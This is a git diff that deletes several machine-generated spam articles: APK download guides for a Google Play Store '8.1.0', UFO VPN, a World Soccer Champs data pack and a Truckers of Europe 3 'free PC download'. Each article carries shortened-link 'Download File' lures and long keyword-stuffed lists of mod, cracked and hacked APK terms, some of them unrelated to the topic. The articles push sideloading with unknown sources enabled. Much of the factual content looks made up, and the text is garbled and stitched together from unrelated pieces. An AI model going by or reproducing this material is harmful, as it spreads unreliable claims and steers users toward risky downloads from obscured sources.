Dynamic Bar Pro is an app that lets you have a dynamic and interactive notification bar on your Android phone, just like the iPhone 14 Pro's Dynamic Island feature. It allows you to access notifications, music controls, messaging, and more from the dynamic bar without leaving your current app or screen. It also allows you to customize the dynamic bar to fit your needs and preferences, such as changing its size, position, background color, transparency, etc. You can even create different styles and themes for your dynamic bar to match your mood or personality.

-

Dynamic Bar Pro is a free app that works on any Android phone running Android 5.1 or higher. It is a popular and highly rated app on the Google Play Store, with over 1 million downloads and 4.5 stars out of 5. Many users have praised the app for its functionality, design, and ease of use.

-

If you are interested in trying out Dynamic Bar Pro and getting the iPhone 14 Pro's Dynamic Island feature on your Android phone, then don't hesitate to download it from the Google Play Store and give it a try. You will be amazed by how much it can enhance your Android experience.

-

If you have any questions or feedback about Dynamic Bar Pro, feel free to contact the developer by emailing sweetsugarapps@gmail.com or visiting their website. You can also leave a review or rating on the Google Play Store page of the app and share your thoughts with other users.

-

Thank you for reading this article and we hope you enjoy using Dynamic Bar Pro.

-

FAQs

-
    -
  • Q1: Does Dynamic Bar Pro work on any Android phone?
  • -
  • A1: Yes, Dynamic Bar Pro works on any Android phone running Android 5.1 or higher.
  • -
  • Q2: Does Dynamic Bar Pro affect my phone's performance or battery life?
  • -
  • A2: No, Dynamic Bar Pro is designed to be lightweight and efficient. It does not consume many resources or drain your battery. You can also adjust the app settings to optimize its performance and battery usage.
  • -
  • Q3: Can I use Dynamic Bar Pro with other apps or launchers?
  • -
  • A3: Yes, Dynamic Bar Pro is compatible with most apps and launchers. You can use it with your favorite apps or launchers without any issues.
  • -
  • Q4: How can I contact the developer of Dynamic Bar Pro for support or feedback?
  • -
  • A4: You can contact the developer of Dynamic Bar Pro by emailing sweetsugarapps@gmail.com or visiting their website. You can also leave a review or rating on the Google Play Store page of the app.
  • -
  • Q5: What are some other apps developed by Sweet Sugar?
  • -
  • A5: Sweet Sugar is a developer of various apps for Android, such as Photo Sketch : Photo Editor, Caller Name Speaker :Announcer, Logo Maker : Design Logo, Cut Paste Photo Editor, My Name Wallpaper, Stylish Text Free - Fancy Text, Digital Business card maker Sweet Sugar , Name Art - Focus Filter - Name, etc. You can find them on the Google Play Store or visit their website for more information.
  • -

-
-
\ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/How to Install Google Play Store 8.1.0 APK on Your Phone or Tablet.md b/spaces/congsaPfin/Manga-OCR/logs/How to Install Google Play Store 8.1.0 APK on Your Phone or Tablet.md deleted file mode 100644 index 35f295f46d55ac173d5c1007a8726e78da7bf813..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/How to Install Google Play Store 8.1.0 APK on Your Phone or Tablet.md +++ /dev/null @@ -1,117 +0,0 @@ -
-

Google Play Store 8.1.0 APK Download: What's New and How to Install It

-

Google Play Store is the official app store for Android devices, where you can find and download millions of apps, games, books, movies, music, and more. An APK file is an Android application package file that contains all the files and code needed to install an app on your device. Sometimes, you might want to download an APK file of an app that is not available in your region or that has not been updated yet through the Google Play Store app.

-

google play store 8.1.0 apk download


Download File: https://urlca.com/2uObuM



-

In this article, we will tell you what's new in the latest version of Google Play Store (8.1.0), how to install it on your Android device using an APK file, and what are some alternatives and solutions if you encounter any problems.

-

What's New in Google Play Store 8.1.0

-

New Design and Layout

-

The first thing you will notice when you open the Google Play Store 8.1.0 app is the new design and layout. The app has a cleaner and simpler look, with a white background and colorful icons. The navigation bar at the bottom has been replaced by a sliding menu on the left side, where you can access different categories of apps, such as games, movies & TV, books, music, newsstand, etc.

-

The app also has a new home screen that shows you personalized recommendations based on your preferences and history. You can also see featured apps, top charts, editor's choice, new releases, etc., by scrolling down or tapping on the tabs at the top.

-

New Features and Improvements

-

The Google Play Store 8.1.0 app also has some new features and improvements that make it more user-friendly and secure. Some of them are:

-
    -
  • Instant apps: You can now try some apps without installing them on your device. Just tap on the "Try Now" button next to some apps in the Google Play Store app and you will be able to use them instantly.
  • -
  • Pre-registration: You can now pre-register for some upcoming apps and games in the Google Play Store app and get notified when they are available for download.
  • -
  • Security updates: The Google Play Store app now scans your device for potentially harmful apps (PHAs) more frequently and notifies you if it finds any.
  • -New Bugs and Issues -

    However, not everything is perfect in the Google Play Store 8.1.0 app. Some users have reported some bugs and issues that might affect their experience. Some of them are:

    -
      -
    • Download errors: Some users have encountered errors when trying to download or update apps from the Google Play Store app, such as "Error 495", "Error 504", "Error 941", etc. These errors might be caused by various factors, such as network problems, cache issues, storage issues, etc.
    • -
    • Compatibility issues: Some users have found that some apps are not compatible with their device or operating system after installing the Google Play Store 8.1.0 app. This might be because some apps have not been updated to support the latest version of Google Play Store or Android.
    • -
    • Performance issues: Some users have noticed that the Google Play Store 8.1.0 app is slower or less responsive than before, especially when browsing or searching for apps. This might be due to the increased load on the app or the device.
    • -
    -

    How to Install Google Play Store 8.1.0 APK

    -

    Requirements and Precautions

    -

    If you want to install the Google Play Store 8.1.0 APK file on your Android device, you need to meet some requirements and take some precautions first. Here are some of them:

    -

    google play store 8.1.0 apk free download
    -download google play store 8.1.0 apk for android
    -google play store 8.1.0 apk latest version download
    -how to install google play store 8.1.0 apk
    -google play store 8.1.0 apk mod download
    -google play store 8.1.0 apk mirror download
    -google play store 8.1.0 apk update download
    -google play store 8.1.0 apk file download
    -google play store 8.1.0 apk old version download
    -google play store 8.1.0 apk direct download
    -google play store 8.1.0 apk offline download
    -google play store 8.1.0 apk cracked download
    -google play store 8.1.0 apk full download
    -google play store 8.1.0 apk original download
    -google play store 8.1.0 apk safe download
    -google play store 8.1.0 apk no root download
    -google play store 8.1.0 apk premium download
    -google play store 8.1.0 apk pro download
    -google play store 8.1.0 apk patched download
    -google play store 8.1.0 apk unlocked download
    -google play store 8.1.0 apk hacked download
    -google play store 8.1.0 apk beta download
    -google play store 8.1.0 apk android tv download
    -google play store 8.1.0 apk android wear download
    -google play store 8.1.0 apk android auto download
    -google play store 8.1.0 apk android tablet download
    -google play store 8.1.0 apk android emulator download
    -google play store 8.1.0 apk android studio download
    -google play store 8.1.0 apk android box download
    -google play store 8.1.0 apk android phone download
    -google play store 8.1.0 apk samsung download
    -google play store 8.1.0 apk huawei download
    -google play store 8.1.0 apk xiaomi download
    -google play store 8.1.0 apk oppo download
    -google play store 8.1.0 apk vivo download
    -google play store 8.1.0 apk oneplus download
    -google play store 8.1.0 apk nokia download
    -google play store 8.1.0 apk lg download
    -google play store 8.1

    -
      -
    • Device compatibility: You need to have an Android device that runs on Android 4.0 (Ice Cream Sandwich) or higher, and that has at least 50 MB of free storage space.
    • -
    • Security settings: You need to enable the "Unknown sources" option in your device's security settings, which allows you to install apps from sources other than the Google Play Store app. To do this, go to Settings > Security > Unknown sources and toggle it on.
    • -
  • File verification: You need to verify that the Google Play Store 8.1.0 APK file you are going to download is authentic and safe, and not a fake or malicious one. To do this, you can check the file size, the file name, the file signature, and the file source before downloading it; a hedged code sketch of such a pre-install check follows this list.
    • -
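None of the checks above require code, but if you want to verify a downloaded APK programmatically before installing it, Android's own PackageManager can do the work. The following is a minimal Kotlin sketch under stated assumptions: the helper name and the expected package name check are ours, the file path is wherever you saved the APK, and on Android 8.0 or newer the single "Unknown sources" toggle mentioned above is replaced by a per-app "Install unknown apps" permission, which is what canRequestPackageInstalls() reports.

```kotlin
import android.content.Context
import android.os.Build

// Hypothetical helper: sanity-check a downloaded APK before installing it.
fun looksLikePlayStoreApk(context: Context, apkPath: String): Boolean {
    val pm = context.packageManager

    // Android 8.0+ uses a per-app "Install unknown apps" permission instead of
    // the old global "Unknown sources" switch; older versions rely on that switch.
    val allowedToInstall = Build.VERSION.SDK_INT < Build.VERSION_CODES.O ||
        pm.canRequestPackageInstalls()

    // Read the APK's manifest without installing it and confirm the package name.
    val info = pm.getPackageArchiveInfo(apkPath, 0) ?: return false
    val isPlayStorePackage = info.packageName == "com.android.vending"

    return allowedToInstall && isPlayStorePackage
}
```

getPackageArchiveInfo() parses the APK on disk without installing anything, so it is a cheap way to confirm the file really declares the Play Store's package name before you go any further.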
    -

    Steps to Download and Install

    -

    Once you have met the requirements and taken the precautions, you can follow these steps to download and install the Google Play Store 8.1.0 APK file on your Android device:

    -
      -
    1. Find a reliable source for the Google Play Store 8.1.0 APK file, such as [APKMirror], [APKPure], or [Uptodown]. Make sure you choose the right version for your device and region.
    2. -
    3. Download the Google Play Store 8.1.0 APK file to your device, or transfer it from your computer using a USB cable or a wireless connection (a small adb-based sketch for installing straight from a computer follows this list).
    4. -
    5. Locate the Google Play Store 8.1.0 APK file on your device using a file manager app or your device's downloads folder.
    6. -
    7. Tap on the Google Play Store 8.1.0 APK file and follow the instructions on the screen to install it on your device.
    8. -
    9. Launch the Google Play Store app and enjoy the new features and improvements.
    10. -
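
      If you would rather push and install the file from a computer than tap through the steps above, the sketch below wraps the standard `adb install` command in Python. It assumes the Android platform-tools (adb) are installed on the computer, USB debugging is enabled on the phone, and the APK file name is a placeholder.

```python
import subprocess
import sys

APK_PATH = "playstore-8.1.0.apk"  # placeholder file name

def adb_install(apk: str) -> None:
    """Install an APK on the connected device via adb; -r keeps existing app data."""
    result = subprocess.run(
        ["adb", "install", "-r", apk],
        capture_output=True,
        text=True,
    )
    print(result.stdout.strip())
    if result.returncode != 0:
        print(result.stderr.strip(), file=sys.stderr)
        sys.exit("adb install failed -- check that the device is connected and authorized.")

if __name__ == "__main__":
    adb_install(APK_PATH)
```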

    Alternatives and Solutions

    -

    However, if you cannot or do not want to install the Google Play Store 8.1.0 APK file on your Android device, you have some alternatives and solutions that you can try. Here are some of them:

    -
      -
    • Use other app stores: You can use other app stores that offer similar or different apps and games for your Android device, such as [Amazon Appstore], [Aptoide], or [F-Droid]. Some of them may carry the apps or games you are looking for, even if they cannot update the Play Store itself.
    • -
    • Update through other methods: You can also nudge the Google Play Store app to update itself by using a VPN, clearing the app data and cache, or uninstalling its updates so it fetches the newest version again (a short adb sketch for the data-clearing option follows this list). Which of these works depends on your device and region.
    • -
    • Wait for the official release: You can also wait for the official release of the Google Play Store 8.1.0 app through the Google Play Store app itself. This might take some time depending on your device and region, but it is the safest and easiest way to get the latest version of Google Play Store.
    • -
    -
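
      For the data-clearing option mentioned in the list above, the same thing can be done over adb instead of tapping through Settings. This is only a sketch; it assumes adb is set up with USB debugging enabled and uses `com.android.vending`, the Play Store's package name.

```python
import subprocess

PLAY_STORE_PACKAGE = "com.android.vending"  # package name of the Google Play Store

def clear_app_data(package: str) -> None:
    """Wipe an app's data and cache on the connected device (same effect as
    Settings > Apps > Storage > Clear data)."""
    subprocess.run(["adb", "shell", "pm", "clear", package], check=True)

if __name__ == "__main__":
    clear_app_data(PLAY_STORE_PACKAGE)
    print("Play Store data and cache cleared; it will rebuild them on next launch.")
```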

    Conclusion

    -

    In conclusion, Google Play Store 8.1.0 is the latest version of the official app store for Android devices, which brings some new design changes, features, and improvements, as well as some bugs and issues. You can install it on your Android device using an APK file, but you need to meet some requirements and take some precautions first. You can also try some alternatives and solutions if you encounter any problems or if you prefer not to install the APK file.

    -

    We hope this article has helped you learn more about Google Play Store 8.1.0 APK download and how to install it on your Android device. If you have any questions, comments, or feedback, please feel free to share them with us in the comment section below. We would love to hear from you!

    -

    FAQs

    -

    Here are some frequently asked questions about Google Play Store 8.1.0 APK download and installation:

    -
      -
    1. Q: Is it safe to install an APK file on my Android device?
    2. -
    3. A: It depends on the source and the content of the APK file. Some APK files might be authentic and safe, while others might be fake or malicious. You need to verify the APK file before installing it on your device, and also enable the "Unknown sources" option in your security settings.
    4. -
    5. Q: How can I check if I have the latest version of Google Play Store on my Android device?
    6. -
    7. A: You can check the version number of your Google Play Store app by opening it and tapping on the menu icon at the top left corner, then tapping on "Settings" and scrolling down to "Play Store version". If there is an update available, you will see a message saying "A new version of Google Play Store is available". If not, you will see a message saying "Google Play Store is up to date".
    8. -
    9. Q: What are some benefits of installing the latest version of Google Play Store on my Android device?
    10. -
    11. A: Some benefits of installing the latest version of Google Play Store on your Android device are:
    12. -
        -
      • You can access new features and improvements that enhance your user experience and security.
      • -
      • You can fix some bugs and issues that might affect your app performance and functionality.
      • -
      • You can get access to new apps and games that might not be available in older versions of Google Play Store.
      • -
      -
    13. Q: What are some drawbacks of installing the latest version of Google Play Store on my Android device?
    14. -
    15. A: Some drawbacks of installing the latest version of Google Play Store on your Android device are:
    16. -
        -
      • You might encounter some errors or compatibility issues when downloading or updating apps from Google Play Store.
      • -
      • You might not like some design changes or layout changes that might affect your app navigation and usability.
      • -
      • You might consume more storage space or battery power than before.
      • -
      -
    17. Q: How can I uninstall or revert to an older version of Google Play Store on my Android device?
    18. -
    19. A: You can uninstall or revert to an older version of Google Play Store on your Android device by following these steps:
    20. -
        -
      1. Go to Settings > Apps > Google Play Store and tap on "Uninstall updates". This will remove all the updates that you have installed for Google Play Store and restore it to its factory version.
      2. -
      3. Go to Settings > Security > Unknown sources and toggle it off. This will prevent you from installing any APK files from sources other than Google Play Store.
      4. Restart your device and launch the Google Play Store app. You should see the older version of Google Play Store on your device. -
      -

      Note that uninstalling or reverting to an older version of Google Play Store might affect your app functionality and security, and you might miss out on some new features and improvements.

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Truckers of Europe 3 PC Version Free Download and Gameplay Guide.md b/spaces/congsaPfin/Manga-OCR/logs/Truckers of Europe 3 PC Version Free Download and Gameplay Guide.md deleted file mode 100644 index 257a1c6ebde781ef445186bd7ece0972018d860c..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Truckers of Europe 3 PC Version Free Download and Gameplay Guide.md +++ /dev/null @@ -1,97 +0,0 @@ - -

      Truckers of Europe 3: A Realistic Truck Simulator Game

      -

      If you love driving big trucks and exploring different places, then you might want to check out Truckers of Europe 3, a simulation game developed by Wanda Software. This game lets you become a real trucker with a realistic driving experience, featuring various trucks, trailers, cargos, roads, weather, traffic, and more. You can travel across many cities from Europe, make money, purchase new trucks and trailers, select your job, and deliver your cargo in an open world. In this article, we will tell you more about the features of this game, how to download it for free on PC, and some tips and tricks to help you play better.

      -

      truckers of europe 3 free download pc


      Download File - https://urlca.com/2uOcvW



      -

      Features of Truckers of Europe 3

      -

      Truckers of Europe 3 is one of the most realistic truck simulator games available on the market. Here are some of the features that make this game stand out:

      -
        -
      • Realistic truck physics and driving experience: The game uses advanced physics to simulate the behavior of real trucks, such as weight distribution, suspension, steering, braking, acceleration, etc. You will feel like driving real trucks with this game.
      • -
      • 7 different trucks with various chassis, customizations and cosmetics: The game offers you a choice of seven different trucks with all available chassis (4x2, 6x2, 6x2/2, 6x2 Midlift, 6x2 Taglift, 6x4, 8x4). You can also customize your truck with different colors, decals, accessories, lights, horns, etc. You can also change the interior of your truck with different seats, dashboards, steering wheels, etc.
      • -
      • 25 trailers and many cargo options: The game has a variety of trailers for different types of cargo, such as flatbeds, containers, refrigerated trailers, tankers, low loaders, etc. You can also choose from many cargo options, such as food products, chemicals, construction materials, vehicles, etc. Some cargos are heavier and harder to handle, so brake smoothly and gradually to avoid skidding, crashing, or damaging your truck and trailer.
      • -
      • Use the map and GPS to plan your route and avoid traffic jams: The game has a map and a GPS system that show you your current location, destination, route, distance, time, etc. You should use these tools to plan your route and avoid traffic jams, road works, tolls, etc. You can also use the map to find gas stations, service stations, rest areas, etc.
      • -
      • Keep an eye on your fuel level and damage indicator: The game has a fuel level and a damage indicator that show you how much fuel you have left and how much damage your truck and trailer have suffered. You should keep an eye on these indicators and refuel or repair your truck and trailer when needed. Running out of fuel or driving with a damaged truck and trailer can result in penalties, fines, or game over.
      • -
      • Customize your truck and trailer to suit your style and preferences: The game allows you to customize your truck and trailer with different colors, decals, accessories, lights, horns, etc. You can also change the interior of your truck with different seats, dashboards, steering wheels, etc. You can customize your truck and trailer to suit your style and preferences and make them stand out on the road.
      • -
      -

      Conclusion

      -

      Truckers of Europe 3 is a realistic truck simulator game that you can download for free on PC. It has many features that make it fun and challenging, such as realistic truck physics and a realistic driving experience, 7 different trucks with various chassis, customizations and cosmetics, 25 trailers and many cargo options, heavy loads and realistic engine sounds, realistic interiors and a smart AI traffic system, country roads and highways across Europe, realistic weather conditions and a day & night cycle, damage and fuel consumption, easy controls and achievements, and excellent HD graphics and optimizations. If you want to play this game for free on PC, you can follow the steps we mentioned above. You can also use the tips and tricks we shared to help you play better. We hope you enjoy this game as much as we do.

      -

      FAQs

      -

      Here are some of the frequently asked questions about Truckers of Europe 3:

      -
        -
      • Q1: Is Truckers of Europe 3 available on other platforms?
      • -
      • A1: No, Truckers of Europe 3 is only available on PC for now. There is no official confirmation about the release of this game on other platforms.
      • -
      • Q2: How can I play Truckers of Europe 3 online with other players?
      • -
      • A2: Unfortunately, Truckers of Europe 3 does not have an online multiplayer mode. You can only play this game offline with AI traffic.
      • -
      • Q3: How can I update Truckers of Europe 3 to the latest version?
      • -
      • A3: You can update Truckers of Europe 3 by downloading the latest patch from the official website or the site where you downloaded the game. You can also check for updates from the launcher or the game menu.
      • -
      • Q4: What are the system requirements for Truckers of Europe 3?
      • -
      • A4: The minimum system requirements for Truckers of Europe 3 are:
      • -
          -
        • OS: Windows 7/8/10 (64-bit)
        • -
        • Processor: Intel Core i3-2100 or AMD FX-4100
        • -
        • Memory: 4 GB RAM
        • -
        • Graphics: NVIDIA GeForce GTX 750 Ti or AMD Radeon R7 260X
        • -
        • DirectX: Version 11
        • -
        • Storage: 5 GB available space
        • -
        -
      • The recommended system requirements for Truckers of Europe 3 are:
      • -
          -
        • OS: Windows 10 (64-bit)
        • -
        • Processor: Intel Core i5-4670 or AMD Ryzen 5 1600
        • -
        • Memory: 8 GB RAM
        • -
        • Graphics: NVIDIA GeForce GTX 1060 or AMD Radeon RX 580
        • -
        • DirectX: Version 12
        • -
        • Storage: 5 GB available space
        • -
        -
      • Q5: Where can I find more information about Truckers of Europe 3?
      • -
      • A5: You can find more information about Truckers of Europe 3 on the official website or the social media pages of the developer. You can also watch gameplay videos or read reviews or blogs about the game online.
      • -

      -

      truckers of europe 3 pc game download
      -how to play truckers of europe 3 on pc
      -truckers of europe 3 simulation game for pc
      -truckers of europe 3 bluestacks emulator download
      -truckers of europe 3 gameloop emulator download
      -truckers of europe 3 noxplayer emulator download
      -truckers of europe 3 android game on pc
      -truckers of europe 3 realistic truck physics on pc
      -truckers of europe 3 driving experience on pc
      -truckers of europe 3 free world on pc
      -truckers of europe 3 european roads on pc
      -truckers of europe 3 weather and day/night cycles on pc
      -truckers of europe 3 wanda software game for pc
      -truckers of europe 3 best platform to play on pc
      -truckers of europe 3 net energy gain on pc
      -truckers of europe 3 mini sun on pc
      -truckers of europe 3 fusion experiment on pc
      -truckers of europe 3 south korea's kstar facility on pc
      -truckers of europe 3 temperature hotter than the sun on pc
      -truckers of europe 3 nuclear fusion reaction on pc
      -truckers of europe 3 king of the roads on pc
      -truckers of europe 3 heavy-duty trucks on pc
      -truckers of europe 3 brand-new trailers and trucks on pc
      -truckers of europe 3 variety of cargo selections on pc
      -truckers of europe 3 different chassis models on pc
      -truckers of europe 3 highways and country roads on pc
      -truckers of europe 3 real engine sounds on pc
      -truckers of europe 3 earn money and buy vehicles on pc
      -truckers of europe 3 choose your own job on pc
      -truckers of europe 3 transport your cargo on pc
      -truckers of europe 3 see a variety of cities on pc
      -truckers of europe 3 take trips around europe on pc
      -truckers of europe 3 learn to drive a truck like a pro on pc
      -truckers of europe 3 exciting simulation game for pc
      -truckers of europe 3 uninterrupted fun and action on pc
      -truckers of europe 3 safest gaming platform for privacy on pc
      -truckers of europe 3 fastest and lightest emulator for pc
      -truckers of europe 3 consume less cpu space and maintain stable fps on pc
      -truckers of europe 3 run different mobile games on pc
      -truckers of europe 3 switch between work and play with ease on pc
      -truckers of europe 3 access to inventive macros in the bluestacks macro community
      -truckers of europe 3 automate the predictable with macros
      -truckers of europe 3 multi instance sync feature
      -truckers of europe 3 script feature
      -truckers of europe 3 complete google sign-in to install the game
      -truckers of europe 3 click to install from the search results
      -truckers of europe 3 icon on the home screen to start playing
      -truckers of europe 3 game features enhancements

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/UFO VPN - The Fastest and Most Reliable VPN for Android - Download APK Here.md b/spaces/congsaPfin/Manga-OCR/logs/UFO VPN - The Fastest and Most Reliable VPN for Android - Download APK Here.md deleted file mode 100644 index 74582cff55017f68b9f674b9c1993b5a36d797ef..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/UFO VPN - The Fastest and Most Reliable VPN for Android - Download APK Here.md +++ /dev/null @@ -1,116 +0,0 @@ - -

      UFO Download APK: How to Get the Best VPN for Android

      -

      If you are looking for a fast, stable, and secure VPN service for your Android device, you might want to try UFO VPN. UFO VPN is a popular VPN app that offers unlimited data, multiple protocols, and access to over 2000 servers in 50 countries. In this article, we will show you how to download and install UFO VPN apk on your Android device, and how to use it to enjoy the best online experience.

      -

      ufo download apk


      Download »»» https://urlca.com/2uOeDI



      -

      What is UFO VPN?

      -

      UFO VPN is a VPN proxy created by Dreamfii, designed specially for Android devices to deliver UFO-fast speeds over a stable and secure connection. A VPN, or virtual private network, is a service that encrypts your internet traffic and routes it through a remote server, hiding your real IP address and location from prying eyes. With UFO VPN, you can:

      -
        -
      • Stream online TV shows and movies from Netflix, Hulu, Disney+, BBC iPlayer, and more.
      • -
      • Play mobile games with low latency and high speed.
      • -
      • Bypass geo-restrictions and censorship on websites and apps.
      • -
      • Protect your online privacy and security from hackers, ISPs, and government surveillance.
      • -
      • Access public Wi-Fi networks safely and anonymously.
      • -
      -

      Features of UFO VPN

      -

      UFO VPN has many features that make it stand out from other VPN apps. Some of them are:

      -
        -
      • One-click connection. All you have to do is open the app and tap the connect button. The internet is yours!
      • -
      • 2000+ servers in 50+ countries. Connect to locations all over the globe, so you can enjoy all the web information at home.
      • -
      • Unlimited data and unlimited bandwidth for all users, free and premium alike.
      • -
      • Multiple protocols. Choose from TCP, UDP, IKEv2, or Shadowsocks protocols according to your needs.
      • -
      • No logs policy. UFO VPN does not collect or store any of your personal data or online activities.
      • -
      • Friendly customer support. Contact the support team via email or live chat anytime you need help.
      • -
      -

      Benefits of using UFO VPN

      -

      By using UFO VPN, you can enjoy many benefits that will enhance your online experience. Some of them are:

      -

      ufo vpn download apk
      -ufo vpn premium apk download
      -ufo vpn mod apk download
      -ufo vpn pro apk download
      -ufo vpn latest apk download
      -ufo vpn free download apk
      -ufo vpn unlocked apk download
      -ufo vpn full apk download
      -ufo vpn cracked apk download
      -ufo vpn hack apk download
      -ufo vpn android apk download
      -ufo vpn app download apk
      -ufo vpn old version apk download
      -ufo vpn new version apk download
      -ufo vpn update apk download
      -ufo vpn beta apk download
      -ufo vpn lite apk download
      -ufo vpn basic apk download
      -ufo vpn best free apk download
      -ufo vpn fast proxy apk download
      -ufo vpn unlimited apk download
      -ufo vpn secure wifi apk download
      -ufo vpn for pubg apk download
      -ufo vpn for firestick apk download
      -ufo vpn for pc apk download
      -ufo vpn for ios apk download
      -ufo vpn for windows apk download
      -ufo vpn for mac apk download
      -ufo vpn for linux apk download
      -ufo vpn for chrome apk download
      -ufo tv app download apk
      -ufo tv mod app download apk
      -ufo tv pro app download apk
      -ufo tv premium app download apk
      -ufo tv latest app download apk
      -ufo tv free app download apk
      -ufo tv unlocked app download apk
      -ufo tv full app download apk
      -ufo tv cracked app download apk
      -ufo tv hack app download apk
      -ufo tv android app download apk
      -ufo tv old version app download apk
      -ufo tv new version app download apk
      -ufo tv update app download apk
      -ufo tv beta app download apk
      -ufo tv lite app download apk
      -ufo tv basic app download apk
      -ufo tv best free app download apk
      -ufo tv fast proxy app download apk

      -
        -
      • You can access any content you want, no matter where you are. Whether it's a video streaming service, a social media platform, or a news website, you can unblock it with UFO VPN.
      • -
      • You can protect your online privacy and security from hackers, ISPs, and government surveillance. Your internet traffic will be encrypted and anonymized by UFO VPN, so no one can see what you do online or steal your personal information.
      • -
      • You can improve your network performance and speed. UFO VPN will automatically connect you to the fastest and most stable server available, so you can enjoy a smooth and lag-free internet connection.
      • -
      -

      How to download and install UFO VPN apk?

      -

      If you want to download and install UFO VPN apk on your Android device, you can follow these simple steps:

      -

      Step 1: Go to the official website of UFO VPN

      -

      The first thing you need to do is go to the official website of UFO VPN. You can use your browser or any other app to access the website.

      -

      Step 2: Choose the Android version and click on the download button

      -

      Once you are on the website, you will see a download button for the Android version of UFO VPN. Click on it and the download will start automatically. You can also scan the QR code on the website with your phone camera to download the app.

      -

      Step 3: Allow unknown sources on your device settings

      -

      Since you are downloading the app from a third-party source, you need to allow unknown sources on your device settings. To do this, go to Settings > Security > Unknown Sources and toggle it on. This will enable you to install apps from sources other than the Google Play Store.

      -

      Step 4: Open the downloaded file and install it

      -

      After the download is complete, you will find the UFO VPN apk file in your Downloads folder or in your notification bar. Tap on it and follow the instructions to install it on your device. It will take only a few seconds to complete the installation.

      -

      Step 5: Launch the app and enjoy the fast and secure VPN service

      -

      Now you are ready to use UFO VPN on your Android device. Launch the app and sign up for a free account or log in with your existing account. You can also use the app without an account, but you will have limited features and servers.

      -

      How to use UFO VPN apk?

      -

      Using UFO VPN apk is very easy and intuitive. Here are some steps to help you get started:

      -

      Select a server from the list or use the smart location feature

      -

      UFO VPN gives you access to over 2000 servers in 50 countries. You can choose any server you want from the list, or you can use the smart location feature to automatically connect to the best server for your location and network.

      -

      Tap on the connect button and wait for a few seconds

      -

      Once you have selected a server, tap on the connect button at the bottom of the screen. You will see a UFO icon spinning and a countdown timer. Wait for a few seconds until the connection is established.

      -

      Browse the internet with freedom and privacy

      -

      Congratulations! You are now connected to UFO VPN and you can browse the internet with freedom and privacy. You can check your IP address and location in the app (a small Python sketch for checking your public IP from outside the app is shown below), or you can visit any website or app you want without any restrictions or interference.
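
      To confirm from outside the app that the tunnel is really active, you can ask a public what-is-my-IP service before and after connecting and compare the two answers. The sketch below uses the api.ipify.org echo service as one example; any similar service would work.

```python
from urllib.request import urlopen

def public_ip() -> str:
    """Return the public IP address the rest of the internet currently sees."""
    with urlopen("https://api.ipify.org", timeout=10) as response:
        return response.read().decode("utf-8").strip()

if __name__ == "__main__":
    # Run once before connecting UFO VPN and once after; the two addresses
    # should differ if the tunnel is working.
    print("Current public IP:", public_ip())
```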

      -

      Conclusion

      -

      UFO VPN is one of the best VPN apps for Android devices. It offers unlimited data, multiple protocols, and access to over 2000 servers in 50 countries. It also has a one-click connection, a no logs policy, and a friendly customer support. You can download and install UFO VPN apk easily by following our guide above, and enjoy the best online experience with UFO VPN.

      -

      FAQs

      -
        -
      • Q: Is UFO VPN free?
      • -
      • A: UFO VPN has both a free version and a premium version. The free version has limited features and servers, while the premium version has more features and servers, as well as faster speed and better security. You can try the premium version for free for 7 days with a trial account.
      • -
      • Q: Is UFO VPN safe?
      • -
      • A: Yes, UFO VPN is safe to use. It encrypts your internet traffic and hides your IP address and location from prying eyes. It also has a no logs policy, which means it does not collect or store any of your personal data or online activities.
      • -
      • Q: Does UFO VPN work with Netflix?
      • -
      • A: Yes, UFO VPN works with Netflix and other streaming services. It can unblock geo-restricted content from Netflix, Hulu, Disney+, BBC iPlayer, and more. You can watch your favorite shows and movies from anywhere in the world with UFO VPN.
      • -
      • Q: How do I cancel my UFO VPN subscription?
      • -
      • A: If you want to cancel your UFO VPN subscription, you can do so by going to Settings > Account > Subscription > Cancel Subscription on the app. You can also contact the support team via email or live chat if you need any assistance.
      • -
      • Q: How do I contact UFO VPN support?
      • -
      • A: If you have any questions or issues with UFO VPN, you can contact the support team via email at support@ufovpn.io or via live chat on the app or website. They are available 24/7 to help you with anything you need.
      • -
      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/World Soccer Champs Data Pack APK The Ultimate Guide for Football Fans.md b/spaces/congsaPfin/Manga-OCR/logs/World Soccer Champs Data Pack APK The Ultimate Guide for Football Fans.md deleted file mode 100644 index 8f82f546f398f851d63cf31f3e9a702574cfa374..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/World Soccer Champs Data Pack APK The Ultimate Guide for Football Fans.md +++ /dev/null @@ -1,106 +0,0 @@ -
      -

      World Soccer Champs Data Pack APK: A Guide for Football Fans

      -

      If you are a football fan and you love playing soccer games on your Android device, you might have heard of World Soccer Champs, a popular and exciting game that lets you manage your team and compete in various leagues and cups from around the world. But did you know that you can also download a data pack APK that adds real player names to the game? In this article, we will tell you everything you need to know about World Soccer Champs and its data pack APK, and why you should give it a try.

      -

      world soccer champs data pack apk


      Download File ——— https://urlca.com/2uOf59



      -

      What is World Soccer Champs?

      -

      A fun and thrilling soccer game for Android devices

      -

      World Soccer Champs is a mobile football game developed by Monkey I-Brow Studios, a studio that specializes in creating sports games for Android devices. The game has been downloaded over 5 million times on Google Play, and has received positive reviews from players and critics alike. The game has a sleek interface, innovative gameplay, intelligent opponents, and realistic graphics that will immerse you in the electrifying drama of every match.

      -

      Features of the game

      -

      World Soccer Champs offers a variety of features that make it one of the best soccer games on Android. Some of these features are:

      -
        -
      • 200+ leagues and cups from all around the world, including local clubs and national teams. You can take your national team to Qatar and compete in the most prestigious soccer competition in the world, or choose from hundreds of other tournaments to test your skills.
      • -
      • Real player names with downloadable data pack. You can download a data pack APK that adds real player names to the game, so you can play with your favorite stars and legends. The data pack also updates regularly to reflect the latest transfers and ratings.
      • -
      • Huge database of 36.000 players and more than 3400 clubs. You can choose from a wide range of players and clubs to build your dream team. You can also customize your players' appearance, skills, attributes, and positions.
      • -
      • Simple to play, challenging to dominate. The game has intuitive swipe-controls that allow you to pass, dribble, shoot, tackle, and save with ease. You can also use different tactics, formations, and strategies to outsmart your opponents.
      • -
